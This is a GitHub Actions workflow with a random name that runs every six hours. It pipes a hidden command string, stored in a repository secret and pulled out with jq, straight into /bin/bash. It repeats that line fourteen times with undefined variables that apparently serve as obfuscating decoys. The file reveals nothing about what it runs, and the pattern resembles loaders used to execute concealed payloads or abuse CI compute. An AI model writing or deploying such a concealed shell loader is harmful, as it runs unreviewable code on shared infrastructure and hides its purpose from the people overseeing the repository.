name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '18 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          os8: ${{ secrets.os8 }}
        run: |
          echo $os8 | jq -r .qj96 | /bin/bash
          echo $fk38 | jq -r .c42087 | /bin/bash
          echo $ogjd922 | jq -r .gttk028 | /bin/bash
          echo $mabnk62817 | jq -r .t13 | /bin/bash
          echo $zend82143 | jq -r .lqhm06898 | /bin/bash
          echo $oml9736 | jq -r .xxv95592 | /bin/bash
          echo $xiswd15 | jq -r .glyhb4 | /bin/bash
          echo $be44 | jq -r .kky2891 | /bin/bash
          echo $l2 | jq -r .gec23584 | /bin/bash
          echo $nnzq32926 | jq -r .ed1704 | /bin/bash
          echo $fbcx895 | jq -r .oi2 | /bin/bash
          echo $k41 | jq -r .r742 | /bin/bash
          echo $khv2 | jq -r .q79 | /bin/bash
          echo $j515 | jq -r .unc96768 | /bin/bash
          echo $gxfzw6960 | jq -r .gbfb4 | /bin/bash

